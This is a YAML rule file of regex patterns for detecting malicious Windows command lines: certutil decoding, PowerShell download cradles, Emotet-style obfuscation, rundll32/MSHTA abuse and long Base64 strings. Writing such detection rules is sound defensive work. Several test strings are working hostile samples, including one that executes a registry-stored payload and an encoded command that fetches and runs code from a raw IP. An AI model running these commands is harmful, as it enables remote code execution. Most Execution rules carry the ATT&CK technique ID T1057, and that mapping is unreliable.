# References
# https://github.com/chenerlich/FCL

keys:
  1:
    command: '.*certutil.exe (.*-decode.*)'
    name: certutil -decode was used, potentially to deobfuscate malware.
    description: Attackers often certutil -decode to retrieve second-stage payloads.
    tactic: Execution
    technique: T1057
    risk: Medium
  2:
    command: '^(?=.*\bbypass\b)(?=.*\bNet\.WebClient\b)(?=.*\bDownloadFile\b)(?=.*\biex\b).*$'
    name: PowerShell was used to download a file.
    description: Attackers often abuse PowerShell features for malicious actions.
    tactic: Execution
    technique: T1057
    risk: Medium
  3:
    command: '^(?=.*\bNonInteractive\b)(?=.*\bbypass\b)(?=.*\bASCII\.GetString\b)(?=.*\bHKCU\b).*$'
    name: PowerShell was used to convert a string from memory.
    description: Attackers often abuse PowerShell features for malicious actions.
    tactic: Execution
    technique: T1057
    risk: Medium
    test: 'powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp ''HKCU:\Software\Classes\test'').test)));'
  4:
    command: '^(?=.*\bWMIobject\b)(?=.*\bSCM\b)(?=.*\bIEX\b)(?=.*\bDownloadString\b).*$'
    name: PowerShell was used with WMI/SCM to download data.
    description: Attackers often abuse PowerShell features for malicious actions.
    tactic: Execution
    technique: T1057
    risk: Medium
  5:
    command: '^(?=.*\bRuntIME\.InteroPsERvICEs\.marshAl\b)(?=.*\bGeTMEmbERS()\b)(?=.*\bSeCureSTrINg\b)(?=.*\bTOStrIng\b)(?=.*\bjoIn\b).*$'
    name: A commandline resembling Emotet was detected.
    description: Attackers often abuse PowerShell features for malicious actions.
    tactic: Execution
    technique: T1057
    risk: Medium
  6:
    command: '^(?=.*\bjavascript:\b)(?=.*\bWScript\.Shell\b)(?=.*\bRegRead\b)(?=.*\beval\b).*$'
    name: A commandline resembling WScript/MSHTA abuse was detected.
    description: Attackers often abuse WScript features for malicious actions.
    tactic: Execution
    technique: T1057
    risk: Medium
  7:
    command: '^(?=.*\bjavascript\b)(?=.*\bRunHTMLApplication\b)(?=.*\bGetObject\b)(?=.*\bscript:http\b).*$'
    name: A commandline resembling rundll32 abuse was detected.
    description: Attackers often abuse rundll32 features for malicious actions.
    tactic: Execution
    technique: T1057
    risk: Medium
  8:
    command: '^(?=.*\bjavascript\b)(?=.*\bRunHTMLApplication\b)(?=.*\bWScript\.Shell\b)(?=.*\bRegRead\b).*$'
    name: A commandline resembling rundll32 abuse was detected.
    description: Attackers often abuse rundll32 features for malicious actions.
    tactic: Execution
    technique: T1057
    risk: Medium
  9:
    command: '(?:[A-Za-z=0-9+/]){200,}'
    name: Commandline containing very long Base64 String
    description: Attackers often abuse Base64 encoding to avoid static detections.
    tactic: Defense Evasion
    technique: T1140
    risk: Medium
    test: "powershell decode from base64 IiRoamY9TmV3LU9ia/mVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskaG+pmLlByb3h5PVtTeXN0ZW0uTl5ldC5XZWJSZXF1ZXN0XTo6R2V0U3lzdGVtV2ViUHJveHkoKTskaGpmLlByb3h5LkNyZWRlbnRpYWxzPVtTeXN0ZW0uTl5ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JGhqZi5IZWFkZXJzLkFkZCgnVXNlci1BZ2VudCcsJ00vNS4xOCcpOyRyPSRoamYuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTMuMTA5LjY5LjUvZ2dnbS91cGwvdHh0Jyk7SUVYICRyIg=="
  10:
    command: 'w[%@!?;:\[\]\{\}=+-_$#\^&*()`~<>]{0,15}s[%@!?;:\[\]\{\}=+-_$#\^&*()`~<>]{0,15}c[%@!?;:\[\]\{\}=+-_$#\^&*()`~<>]{0,15}r[%@!?;:\[\]\{\}=+-_$#\^&*()`~<>]{0,15}i[%@!?;:\[\]\{\}=+-_$#\^&*()`~<>]{0,15}p[%@!?;:\[\]\{\}=+-_$#\^&*()`~<>]{0,15}t'
    name: Commandline containing obfuscated wscript
    description: Attackers often abuse cmd-line obfuscation/encoding to avoid static detections.
    tactic: Defense Evasion
    technique: T1140
    risk: High
    test: 'C:\afoabngf\aogfbn\cmd.exe /c set x=w@sc@r@i@pt /e:j@sc@rip@t .. echo %x:@=%|cmd'